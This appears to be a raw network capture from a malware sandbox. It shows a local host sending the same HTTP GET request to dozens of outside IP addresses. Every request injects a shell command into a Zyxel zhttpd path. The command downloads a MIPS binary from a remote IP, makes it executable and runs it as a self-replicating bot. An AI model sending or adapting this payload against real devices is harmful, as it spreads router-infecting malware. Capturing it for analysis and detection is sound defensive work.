                                      Jan 14, 2024 15:50:41.165666103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2899192.168.2.1434338109.46.28.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165729046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2900192.168.2.1448498107.177.89.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165791988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2901192.168.2.1444622103.44.34.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165868998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2902192.168.2.143802861.188.88.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165908098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2903192.168.2.1451628126.90.242.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165941954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2904192.168.2.145342674.103.166.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166011095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2905192.168.2.1439238116.177.204.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166073084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2906192.168.2.143712458.55.255.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166105032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2907192.168.2.1444032104.211.93.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166188955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2908192.168.2.1457400193.198.149.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166225910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2909192.168.2.1436432160.152.19.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166265965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2910192.168.2.145980493.90.158.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166321993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2911192.168.2.1455934101.166.187.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166373014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2912192.168.2.1445970141.63.105.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166425943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2913192.168.2.144411225.161.245.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166452885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2914192.168.2.145339844.147.160.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166510105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2915192.168.2.145713847.6.33.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166572094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2916192.168.2.1448790205.129.254.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166608095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2917192.168.2.1439876153.24.237.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166673899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2918192.168.2.1445848138.187.113.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166722059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2919192.168.2.1443888163.137.96.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166763067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2920192.168.2.1440616200.212.18.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166799068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2921192.168.2.1457450184.225.0.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166847944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2922192.168.2.145159867.135.13.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166917086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2923192.168.2.1437474156.135.40.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.166980982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2924192.168.2.1438984173.18.160.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167027950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2925192.168.2.144978888.70.109.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167067051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2926192.168.2.146021650.163.144.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167140961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2927192.168.2.145215839.173.123.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167207956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2928192.168.2.144661247.78.44.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167258978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2929192.168.2.145961299.62.180.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167313099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2930192.168.2.145313857.115.253.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167391062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2931192.168.2.144833084.127.211.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167447090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2932192.168.2.1454746144.38.98.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167507887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2933192.168.2.1458016175.184.247.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167560101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2934192.168.2.1454532205.249.238.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167644024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2935192.168.2.1450306203.18.35.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167684078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2936192.168.2.1439154173.208.103.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167737961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2937192.168.2.14503508.202.44.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167783022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2938192.168.2.145844461.27.160.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167839050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2939192.168.2.1435024156.211.138.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167886019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2940192.168.2.1442230124.89.114.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167937040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2941192.168.2.1434198202.98.187.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.167999983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2942192.168.2.1439884132.55.30.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168060064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2943192.168.2.144104469.32.65.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168111086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2944192.168.2.1455658160.111.20.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168148041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2945192.168.2.1444382178.4.247.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168170929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2946192.168.2.144516283.155.204.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168211937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2947192.168.2.1457232216.30.30.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168271065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2948192.168.2.143327695.187.195.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168345928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2949192.168.2.144932218.122.126.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168411016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2950192.168.2.1447568111.199.4.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168447971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2951192.168.2.143544027.100.10.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168483019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2952192.168.2.1442562124.1.45.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168556929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2953192.168.2.1455594211.110.84.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168601990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2954192.168.2.1434000195.183.17.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168699980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2955192.168.2.1439694107.77.222.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168754101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2956192.168.2.1445572203.68.123.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168781042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2957192.168.2.1452186147.202.173.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168817043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2958192.168.2.1444812116.122.246.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168890953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2959192.168.2.145948879.240.82.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168942928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2960192.168.2.1440346168.95.110.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.168975115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2961192.168.2.145416690.74.128.246443
                                      TimestampBytes transferredDirectionData
